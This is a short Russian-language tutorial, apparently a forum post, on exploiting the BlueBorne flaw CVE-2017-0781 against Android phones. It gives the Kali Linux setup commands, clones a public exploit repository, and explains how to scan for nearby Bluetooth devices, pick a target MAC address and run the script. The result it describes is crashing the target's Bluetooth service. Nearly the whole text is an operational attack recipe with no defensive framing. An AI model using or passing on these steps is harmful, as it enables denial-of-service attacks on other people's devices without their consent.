Blueborne. Переполнение буфера /Android
<<autorun.winlock>>Применение уязвимости CVE-2017-0781.
Скрипт, который мы будем использовать, позволит осуществить переполнение буфера на целевом устройстве Android с последующим отказом в эксплуатации службы Bluetooth.
Версии Android OS подверженные уязвимости:
* Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0.
Сразу уточню, что мы будем использовать Kali Linux.
Установка зависимостей:
>apt-get update
>apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
>pip install --upgrade pip
>pip install --upgrade pwntools
установка pybluez:
>apt-get install bluetooth libbluetooth-dev
>pip install pybluez
копируем эксплойт
> git clone https://github.com/ojasookert/CVE-2017-0781
Теперь сканируем эфир Bluetooth. Выбираем уст-во.
Копируем MAC-адресс устро-ва (пример 04:5C:9E:5D:25:90).
Далее запускаем скрипт :
> python CVE-2017-0781.py TARGET = 04:5C:9E:5D:25:90
В случае успеха на устройстве вы увидите :
"В приложении "Передача по Bluetooth" произошла ошибка "